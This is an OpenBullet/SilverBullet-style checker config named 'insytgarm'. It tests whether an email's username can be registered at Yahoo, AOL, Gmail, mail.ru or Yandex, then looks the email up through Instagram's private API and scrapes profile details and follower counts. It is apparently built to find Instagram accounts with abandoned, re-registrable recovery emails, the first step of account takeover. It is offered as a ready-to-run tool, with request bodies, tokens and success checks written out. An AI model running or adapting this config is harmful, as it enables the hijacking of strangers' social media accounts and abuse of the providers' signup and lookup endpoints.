[SETTINGS]
{
  "Name": "insytgarm",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-01-13T00:33:26.6206209+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "insytgarm",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#domin PARSE "<USER>" LR "@" "" -> VAR "DO" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<DO>" EqualTo "aol.com" 
    KEY "<DO>" EqualTo "gmail.com" 
    KEY "<DO>" EqualTo "mail.ru" 
    KEY "<DO>" EqualTo "yandex.com" 
    KEY "<DO>" EqualTo "yahoo.com" 
  KEYCHAIN Failure AND 
    KEY "<DO>" NotEqualTo "aol.com" 
    KEY "<DO>" NotEqualTo "gmail.com" 
    KEY "<DO>" NotEqualTo "mail.ru" 
    KEY "<DO>" NotEqualTo "yandex.com" 
    KEY "<DO>" NotEqualTo "yahoo.com" 

#US FUNCTION Replace "@.+" "" UseRegex=TRUE "<USER>" -> VAR "US" 

IF "<DO>" EqualTo "yahoo.com"

#GET REQUEST GET "https://login.yahoo.com" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.115 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#crumb PARSE "<SOURCE>" LR "name=\"crumb\" value=\"" "\"" -> VAR "crumb" 

#acrumb PARSE "<SOURCE>" LR "name=\"acrumb\" value=\"" "\"" -> VAR "acrumb" 

#POST REQUEST POST "https://login.yahoo.com/account/module/create?validateField=yid" 
  CONTENT "specId=yidreg&cacheStored=&crumb=<crumb>&acrumb=<acrumb>&done=https%3A%2F%2Fwww.yahoo.com&googleIdToken=&authCode=&attrSetIndex=0&specData=&tos0=oath_freereg%7Cus%7Cen-US&firstName=&lastName=&yid=<US>&password=&shortCountryCode=US&phone=&mm=&dd=&yyyy=&freeformGender=&signup=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.115 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: login.yahoo.com" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "Referer: https://login.yahoo.com/account/create?specId=yidReg&done=https%3A%2F%2Fwww.yahoo.com" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-GPC: 1" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "IDENTIFIER_EXISTS" 
    KEY "IDENTIFIER_NOT_AVAILABLE" 
    KEY "CANNOT_END_WITH_SPECIAL_CHARACTER" 
    KEY "ELECTION_SPECIFIC_WORD_PRESENT" 
    KEY "RESERVED_WORD_PRESENT" 
    KEY "CANNOT_START_WITH_SPECIAL_CHARACTER_OR_NUMBER" 
    KEY "SOME_SPECIAL_CHARACTERS_NOT_ALLOWED" 
    KEY "CANNOT_HAVE_MORE_THAN_ONE_PERIOD" 
  KEYCHAIN Success OR 
    KEY "{\"name\":\"lastName\",\"error\":\"FIELD_EMPTY\"},{\"name\":\"password\"" 

ENDIF
IF "<DO>" EqualTo "aol.com"

#GET REQUEST GET "https://login.aol.com" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#crumb PARSE "<SOURCE>" LR "name=\"crumb\" value=\"" "\"" -> VAR "crumb" 

#acrumb PARSE "<SOURCE>" LR "name=\"acrumb\" value=\"" "\"" -> VAR "acrumb" 

#POST REQUEST POST "https://login.aol.com/account/module/create?validateField=yid" 
  CONTENT "specId=yidreg&cacheStored=&crumb=<crumb>&acrumb=<acrumb>&done=https%3A%2F%2Fwww.yahoo.com&googleIdToken=&authCode=&attrSetIndex=0&specData=&tos0=oath_freereg%7Cus%7Cen-US&firstName=&lastName=&yid=<US>&password=&shortCountryCode=US&phone=&mm=&dd=&yyyy=&freeformGender=&signup=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.aol.com" 
  HEADER "Origin: https://login.aol.com" 
  HEADER "Referer: https://login.aol.com/account/create?specId=yidReg&done=https%3A%2F%2Fwww.aol.com" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "IDENTIFIER_EXISTS" 
    KEY "IDENTIFIER_NOT_AVAILABLE" 
    KEY "CANNOT_END_WITH_SPECIAL_CHARACTER" 
    KEY "ELECTION_SPECIFIC_WORD_PRESENT" 
    KEY "RESERVED_WORD_PRESENT" 
    KEY "CANNOT_START_WITH_SPECIAL_CHARACTER_OR_NUMBER" 
    KEY "SOME_SPECIAL_CHARACTERS_NOT_ALLOWED" 
    KEY "CANNOT_HAVE_MORE_THAN_ONE_PERIOD" 
  KEYCHAIN Success OR 
    KEY "{\"name\":\"lastName\",\"error\":\"FIELD_EMPTY\"},{\"name\":\"password\"" 

ENDIF
IF "<DO>" EqualTo "gmail.com"

#GET REQUEST GET "https://accounts.google.com/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#TK1 PARSE "<SOURCE>" LR "],null,&quot;" "&quot" -> VAR "TK1" 

#tk2 PARSE "<SOURCE>" LR "\\\",null,[\\\"\\\"],\\\"" "\\\"]\",\"" -> VAR "tk2" 

#TK2 FUNCTION URLEncode "<tk2>" -> VAR "TK2" 

#POST REQUEST POST "https://accounts.google.com/_/signup/accountdetails?hl=fr&_reqid=353278&rt=j" 
  CONTENT "continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&service=mail&ltmpl=default&f.req=%5B%22<TK1>%22%2C%22aDem%22%2C%22ChaOua%22%2C%22aDem%22%2C%22ChaOua%22%2C%22<US>%22%2C%22FUCKFUCKFUCK121a%22%2C%22<US>%22%2Ctrue%2C10%2C%5Bnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B5%2C%2277185425430.apps.googleusercontent.com%22%2C%5B%22https%3A%2F%2Fwww.google.com%2Faccounts%2FOAuthLogin%22%5D%2Cnull%2Cnull%2C%22cfba74b6-a1ec-40d3-8257-c7ca50386243%22%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C5%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2C%5B%5D%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2C%5B%5D%5D%5D&bgRequest=%5B%22web-glif-signup%22%2C%22%3CrWFqYSwCAAZ0Ke-SdCmN-aZ0AfGN1sv0ACkAIwj8RouAA4WYvKkOkWvzQOF9rW50FS6BsgC-Yvtes7A056GFU0lWc80AABGLnQAAAA-nAQdWDOFsWjv9W9H-0xuy6jpFIQkdYAe_U84x1xmuKu12bmvcWLB02f574O0NmBH-utUx4D6q9zLoP0X5kjsFlTfbMrdYuzwZ4sHT6w56_mboMQNXdzOEJrzkEmSEOyrDpj4K3TUOjr0PZGRy-fK_OXV322GJaYI5LuaDZRhoySqNu8ajABwHcSAYB0rItyoIMC8nn9FKpwm_Hb5ss058F7ZH2QRg7ZZmNy4-4XtrOOCw43No6aDJByeLkDeGWHwKLHvIbvkYOonIzuBVns6-4Xlc0ADGlPRQ9rFeaGryWxH_Bn4A5J6NvWiXxej91Cd5xOPy14w6EIZ6-7b7zgr7yCXpfWxLF015P0qeVQZ73j0YKgj24defmXRiYQ9o66znBw6iLKzmM5K1HIX5qbSVMPkdq-YJXqO5nXAsjNEo-LO5LrnTLaRkERSDBWnTL8hKIA5_G6LTfkIa8z9iI_8tBLnJlfLO2Udic-TTRSkAJg4-ioDy8NHsKS4AtF9NUY5Gochyy6III9Dzdn9pJEagr9alkgfj4e2GWDVU_7IKGwPQPgXfYtKMYREgZhXzntzs5Ckt660syLW5ZezVxdRReBafXxDXSrYGy-tKB8QEKIMASx-fky0_EkS1eHaqKK6UyBTOv8VdYIb4UWhBB-8z1R1nsodxDFfUVUjafkENDAnmJSrTN0WVCRNgipUZs_d4iUNQtvrGyLEfeH2obFjI1zzqFo5Yof-yn_DWEr1ukX1QAdkc_lVVO9tnBkJ4VXmwwr-C2DUus4LM_UjTWYUQYSmZvAjvkIps31kaDmFfzlO-EbGyptopaYAxo5_R_4nCvB9wwR__Y_uNgvQJigmJi9lDC2185yF5o9XSBFh5vqVRZwXsFt68Cw6AqTeg6_1O0XBmzGXpaJHrapZB_ljhcNhWt8Bu2wz5OuDbcAQJZSnZVEgXF1_r7gkR1y2e0_Nfj7E2WWpCZaygvPcZS5qIlSMcFxtL8_Ux23N9d-lc_hj6_LpdcNJTLiwdp65WxYuPPmVI-ngAKh5JOu-IwqcYaQUtqmcPmlZMtIpXlq6cvv7YSC5z4SEPo3INVQy31rubBpKwP69X3k26YYjqdI4aF4We1aWh1sUBmYlHSZaKCAtRkmyjS8tA-euGlmvcc_s3RWYmpQiULvj-ZSMY85QR96NM6ePKAxjJJH6hwS7BjMLshPzYTJrzJnqLiyo-iwEhzOKuTk8eDvaZfJsmwheST567snXAh6YxHyMnOi0Yx6luFwsPgEPhfqakmTl0_mu96UTqPXy3Ubv9pyhWA94nZcsw6radjsO4TdlD-QKF80U7z6LmTwHdYc-ArwoHXEDtzRCYS-9Pk_Zb3ZL_Fz-KxjsxXbd08xAGWtwFNMCWSS7dAYXhgdsJpLzGZ0s1kl1ehYYFkhKmPSC0jNPkaZaNbcan-F6_xesouPd8nNjlKoBTJY7OQfISYgYqWpsvyM3X3wl7zqFlkd8q6JuYdynhyu6NI0LF2FegGfnNkBUosxuE4HRQ2TReh2FE-zS8MZlX8QO9F_Wj0BCIa_XeypC5djdv1EwG2Eb_grn7wVH6ByUn7CElnRmBixo3aGzgrF7GTqU4GAaV3AxxIT3ih02An-WdlNIY6k-Ot5wUJ3YbjWCs_knEPvLlSrdXl2t6qsWkPXBYyWtS9WxDHgfSn5zCHC31exEZEr5UnNkF4wOJJEo6gukiXenClMTLMXjZVleircLlTV8S8sMpI7HwCb6gj6Y56NQCiAYhbZTKFYnpG86gGpiIbBn1maoYpPzz6uUjcozGXIdy6Sug7AFL-rD7zyLQylHOXBejbteqngSgmw3aMkBB3-8AMFwkaNf8JGNhK022RfRAnoK1TaUP3UpnLchYuicyIBWl5jqORTog4GX1W3CBB9PZC1HV7KRXV5E44ODinp5tofD3sX6ebZmToafVwHbkfXSxG-cBsG7SnmOC6cVV4BobW7dCol0ibl24eZZGRoFihGbTbzEwpfiIgByfKBflRH-pol8zaDQzbIfTFxD4lap_NTin9w8t2ooFtRBxr4_IVNxv1PxjGibJP_jDO_7GJUZnVr5scJiltBq-xXF-liLL3xmVsetpd78Eg0Vz0JOQ2ZdgTr-oRJ5prL3t7xFSkJdAj6kKNH-2TSproD_xfW8acy-MdM7u-XBkkE5x-2ldFKMF-7qs3djvofJAl0nwk06NKOW2iWtTsEd5wvI6DC46L_NKQ0aT2p0ec783OilrcE_-W7YKVqZsgoeVKrliKZqRNEJ78vdityE1dWTq2vyvFH8cSDgXSDT8AVP3Rl_0qLLS61qyIOSAiRekf9fPOstBtUS-TqZUUzE10doaNcGqMBlZDuwoGolaKt4BTV8T9N0DDge9dRU5sl3ty4fnkiOYf7epaditoyuwGahsxNa_biQBI7_Ri15uzfZwUlP9EU4BKKmM0VafTjNWAf4Iaon04DWAFAlMa5PzrL2o1hyS-C7tqZu0uCmwiEuMPL3ueYkMN6VTT2AKt-ITDgf9T_VvmSSaY1AXlq-q3gDRY-AZju573dW4ByWixyID64y5GOaiUw1Dhuu5o8XDfc2wSSBqNDwwVGTTaqc1i1Fvw7inb1T8tQE2yecet0q4b5kjjZ3N6GvIaUrd9b7RxTa_D89jTDOavnOwsxPH8veC8-8UeIIAfFUAEu8mUL2r6lqUXaV2yZ6wB1zycuo8Ae6-eFTD_QlfpCmb_84N6JQOeLRTbBn1qfhQCTmCVxf3ch6zLvFFhHG_d9QGN_bgKCn5LyPG9SIIRV_N5ZQYx3x8Go26zBAGoDFkGoYrXoQeZJem-bX5-bxm3Zo9MUtFWiL-S4olvD-bCxl_VQi-QnLArKzxvw2iu--kMAU2E05rylVX2vA3e7BCUyE_bZn-O9Nr8-L4QZ5Q_bY5xiMOD0YnVr10cgX2_FtZO4mdeyvIYjcRDNS-TZrCLSa78RzVzirWqTr8A9Fq-GLbP72k0HfGkuIJMp1NmVWe4x2ByUWuUDLjYKInhSfB21uJKJ7NiYIVG3dEsnceYODoXBApVSqqTeh5Ppo6S9SAtX7mfpt8NJpx9g-g7aJUhc4-TePvPJoYmu256ryxadjKl_cXmQuTwnrdCMSgfLQ9tm6EI8yx7EFm976ZVVH5VF9hfhCH3gzwuvHkPxreHI4mowEaLGn6wjJNgM8nb-58GFjhrzlAa_E1UgO8XjyJmh3cZUkdZYR0eO0guVCV5ET2hR7mOgl6vof7Up317RajlQbSnFT-DAAAmgms53FSp5Yj9EhurD0Np8wAXc4_lVKYNMp4nf40FkdS6aa-_wJ3kmRCD4r1d2aFdCAd5Xy91ZZMH-t9XSSE9geSAhJOHHuDEJk5Br8KUQowfbHaQZVU45bkpvLxzFklKdYyPL8r6uqWHB5tmtGl0xelH0UuWRqi0zG61FKdBJKnH0ehyMphblsbDw0_BTGg1fGs3maOr5ja7FC3KKkf65ONIKGxyaE9BBEsAXI2k2AkaOW1VpYH0ePo4Y8UkMzLetsGl0kWRuVdUdImKv47I94yFqJN_Ckk79Us9N7tbLZWhZqjUiS09ECi5KI7tYFaQ0n44l6pzIp1XIirKTq5RyNeA25DH3eRs_QajYxcI-X1_hwqWZc-B6WSOfOg42dM71g-OXBbQ1Sm0AKFBI-KHtflK1c4Z0xmbQd4bbyOZ3qBwijsL8_0grh6VJZbCANyyY7MbSQQvKY_MKqdtX_PaEAY9SqjlTIcIbaONBVy_oKHbN4mkxdRWtkbFb7K0OYZ_uRPLc4JnuPKtYRFwvtkBqSXocQQ-DZ7PSt4ks_Sw3bK_0ogyYK3QSD2PT5GrABx9G5s_Vn6evck5qsOb0EL1M-WlTYSTQSd1oMk_VU2W4d2CQ9BrR5yOXyEgPJEbjhBcQ1Za9o4YJwhSe-yeR6056oc8Vk5GCap4UjwaTesFqEcPCvfbuy3kKKGR9qRfl6DMtxuOCh_CFnkSDHvFEtnOeW6xn58aQSSRv_2fE2BjGF_Rq0IUtYtP-MydEnPz4yiTZNvPoFfJe5C4Pa7YkgaYXZ4eT8uVslmJqqXQFC_VjCMDcdefHmEfgmA8ngmtYEClV_SgI7EGNmO0IJliDIgGrfbwxV71Xax6Fm-_jzD39XEM4cHBmFGr4PL88Q8ncIXLaq0zOWb4zWuewTdOUfIBhmRwjjNIqildkaXmpL1mSCI5TMwdElOg4WQfAX8QBxQkkavEB9enfaTrGePzsV5bPgpj40n_93panOFPL9xjNhKKxKfSISbC5SNK2_EF_DqZ8L8jU4JVf7-Ww_ZWwjALRO8taUgZI-audak6T8yXH01M0y4249ccCoFQS6qXY80Db2ZLbw6siieLiyeQ9Xb4CeEEgOBjoglKKHQj9zCwVk%22%5D&azt=<TK2>&cookiesDisabled=false&deviceinfo=%5Bnull%2Cnull%2Cnull%2C%5B%5D%2Cnull%2C%22DZ%22%2Cnull%2Cnull%2Cnull%2C%22GlifWebSignIn%22%2Cnull%2C%5Bnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B5%2C%2277185425430.apps.googleusercontent.com%22%2C%5B%22https%3A%2F%2Fwww.google.com%2Faccounts%2FOAuthLogin%22%5D%2Cnull%2Cnull%2C%22cfba74b6-a1ec-40d3-8257-c7ca50386243%22%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C5%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2C%5B%5D%5D%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5B%5D%2Cnull%2Cnull%2Cnull%2C%5B%5D%2C%5B%5D%5D%2Cnull%2Cnull%2Cnull%2Cnull%2C1%2Cnull%2Cfalse%2C1%2C%22%22%5D&gmscoreversion=undefined&" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7,ar;q=0.6" 
  HEADER "content-length: 6453" 
  HEADER "content-type: application/x-www-form-urlencoded;charset=UTF-8" 
  HEADER "google-accounts-xsrf: 1" 
  HEADER "origin: https://accounts.google.com" 
  HEADER "referer: https://accounts.google.com/signup/v2/webcreateaccount?service=mail&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&ltmpl=default&flowName=GlifWebSignIn&flowEntry=SignUp" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "[[[\"gf.wadr\",4," 
  KEYCHAIN Failure OR 
    KEY "[[[\"gf.wadr\",5," 

ENDIF
IF "<DO>" EqualTo "mail.ru"

#GET REQUEST POST "https://auth.mail.ru/api/v1/pushauth/info?login=<USER>" 
  CONTENT "login=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: auth.mail.ru" 
  HEADER "Origin: https://mail.ru" 
  HEADER "Referer: https://mail.ru/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"exists\":false,\"" 
  KEYCHAIN Failure OR 
    KEY "\"exists\":true,\"" 
    KEY "body\":\"forbidden\"" 

ENDIF
IF "<DO>" EqualTo "yandex.com"

#GET REQUEST GET "https://passport.yandex.com/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#csrf PARSE "<SOURCE>" LR "=\"csrf_token\" value=\"" "\"/>" -> VAR "csrf" 

#CSRF FUNCTION URLEncode "<csrf>" -> VAR "CSRF" 

#POST REQUEST POST "https://passport.yandex.com/registration-validations/login" 
  CONTENT "track_id=4d5d983773fef57744a1c303a047ee68cc&csrf_token=<CSRF>&login=<US>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: passport.yandex.com" 
  HEADER "Origin: https://passport.yandex.com" 
  HEADER "Referer: https://passport.yandex.com/" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"status\":\"ok\",\"" 
  KEYCHAIN Failure OR 
    KEY "[\"login.not_available\"]" 

ENDIF

#POST REQUEST POST "https://i.instagram.com/api/v1/users/lookup/" 
  CONTENT "ig_sig_key_version=4&signed_body=afd3e1cc0128d2b677b05da8395da967b8a3ed7eecbb1ed422f731a0fbac4e5a.%7B%22q%22%3A%22<USER>%22%2C%22_csrftoken%22%3A%22d3EjjCOFUb0i0u0tDNyIgB96xBlBXmVs%22%7D" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Content-Length: 206" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Host: i.instagram.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "User-Agent: Instagram 6.12.1 Android (28/9; 272dpi; 720x1426; OPPO; CPH1923; OP486C; mt6765; ar_EG)" 
  HEADER "Accept-Language: ar-EG, en-US" 
  HEADER "X-IG-Connection-Type: WIFI" 
  HEADER "X-IG-Capabilities: AQ==" 
  HEADER "Accept-Encoding: gzip" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "status\":\"ok\"}" 
  KEYCHAIN Failure OR 
    KEY "status\":\"fail\"}" 

REQUEST GET "https://www.picuki.com/profile/<US>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "title>@" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "title>Error 404" 

PARSE "<SOURCE>" LR "profile-name-bottom\">" "</h2>" CreateEmpty=FALSE -> CAP "Name" 

PARSE "<SOURCE>" LR "title>" " Instagram " CreateEmpty=FALSE -> CAP "User" 

PARSE "<SOURCE>" LR "data-followers=\"" "\" class=\"" CreateEmpty=FALSE -> CAP "Followers" 

PARSE "<SOURCE>" LR "span data-followers=\"" "\" class" CreateEmpty=FALSE -> CAP "Following" 

PARSE "<SOURCE>" LR "id = '" "'" -> VAR "id" 

REQUEST GET "https://o7aa.pythonanywhere.com/?id=<id>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "data\": " ", " CreateEmpty=FALSE -> CAP "data" 

